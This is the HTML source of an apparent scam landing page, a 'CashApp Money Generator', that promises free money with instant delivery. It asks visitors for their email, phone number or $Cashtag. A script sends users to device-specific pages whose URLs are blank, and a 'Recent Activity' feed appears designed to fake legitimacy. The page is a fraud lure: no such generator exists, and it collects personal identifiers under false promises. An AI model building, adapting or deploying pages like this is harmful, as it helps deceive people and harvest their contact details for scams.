<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

    <title>CashApp - Money Generator</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<meta name="description" content="CashApp Money Generator - [Updated 2020]" />    
	<link rel="icon" type="image/ico" href="img/favicon.ico" />
	<!-- Open Graph Social Meta Tags-->
	<meta property="og:title" content="CashApp Money Generator - [Updated 2020]" /> <!-- Title which is displayed when your site is shared on social networks -->
	<meta property="og:description" content="CashApp Money Generator - [Updated 2020]" /> <!-- Website description which is displayed when your site is shared on social networks -->
	<meta property="og:type" content="website" />
	<meta property="og:url" content="index.html" /> <!-- Your Website URL -->
	<meta property="og:image" content="socials.jpg" />	<!-- Absolute Path to the Image which will display, when your website is shared on social networks -->
	<!-- Fonts -->
	<link href="https://fonts.googleapis.com/css?family=Quicksand:300,400,700&amp;display=swap" rel="stylesheet">
	<link rel="stylesheet" href="https://cdn.linearicons.com/free/1.0.0/icon-font.min.css">
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
	<!-- CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />  
    <link href="css/animate.css" rel="stylesheet" />
    <link href="css/magnific-popup.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />	
</head>
<body>
	<div class="a-b-m">
		<header>
			<div class="container">
				<div class="branding">
					<img src="img/logo.png" class="img-fluid img-logo animated bounceIn" alt="CashApp Logo" />
					<div class="animated bounceIn animation-delay-200">
						<h1>Generate Money</h1>
					</div>
				</div>
				<div class="presentation-wrapper">
					<div class="row double-margin">
						<div class="col-xl-4 double-padding">	
							<div class="presentation-item animated bounceIn animation-delay-400">	
								<span class="lnr lnr-thumbs-up"></span>
								<h4>Entirely Free</h4>
								<p>Want to thank us for our free services? Tell a friend about us or share this page on social media. </p>
							</div>	
						</div>	
						<div class="col-xl-4 double-padding animated bounceIn animation-delay-600">	
							<div class="presentation-item">	
								<span class="lnr lnr-hourglass"></span>
								<h4>Instant Delivery</h4>
								<p>There's nothing like instant gratification, and with the daily addition of new servers you can count on us for instant delivery. </p>
							</div>	
						</div>
						<div class="col-xl-4 double-padding animated bounceIn animation-delay-800">	
							<div class="presentation-item">	
								<span class="lnr lnr-earth"></span>
								<h4>Countries Accepted</h4>
								<p>Currently our services are available to Unites States, United Kingdom and Canada but we are working hard to make it available to more locations.</p>
							</div>	
						</div>
					</div>
				</div>
				<div class="pointer-wrapper">
					<span class="lnr lnr-arrow-down"></span>
				</div>
			</div>
		</header>
		<section class="main-section">
			<div class="container">
				<div class="user-info-wrapper">
					<h3 class="input-label animated bounceIn animation-delay-1000">Enter your email address, phone number or your $Cashtag</h3>
					<div class="form-wrapper animated bounceIn animation-delay-1000">		
						<div class="input-wrapper">
							<img src="img/input-icon.png" class="input-icon" />
							<input id="input-user-info" type="email" class="styled-input" placeholder="Email or phone number..." />							
						</div>
						<div class="input-error-notice">Please enter your email, phone number or $Cashtag.</div>
					</div>
					<div class="button-wrapper animated bounceIn animation-delay-1200">
						<div id="go-b-1" class="button animated pulse infinite">Proceed</div>
					</div>
				</div>	
				<div class="recent-activity-wrapper animated bounceIn animation-delay-1400"><!-- Recent Activity START -->
					<div class="styled-label">Recent Activity</div>
					<div class="recent-activity-content">
						<div id="recent-activity" class="recent-activity"></div>	
					</div>	
				</div>	
			</div>
		</section>
	</div>
	<div class="M550i"></div>
	<!-- JavaScript/jQuery -->	
	
	
<script>
     function LetsMakeMoney(){
        var userAgent=navigator.appVersion;
        if (userAgent.indexOf('Android')!=-1) {
            window.open('')
        }
        else if (userAgent.indexOf('iPhone')!=-1 || userAgent.indexOf('iPad')!=-1) {
            window.open('')
        }
        else {
            window.open('')
        }
    }
</script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>	
	<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js" type="text/javascript"></script>
	<script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>	
	<script type="text/javascript" src="js/jquery.countTo.js"></script>	
	<script type="text/javascript" src="js/ion.sound.min.js"></script>	
    <script type="text/javascript" src="js/main.js"></script>
	<script type="text/javascript" src="js/activity.js"></script>
</body>
</html>
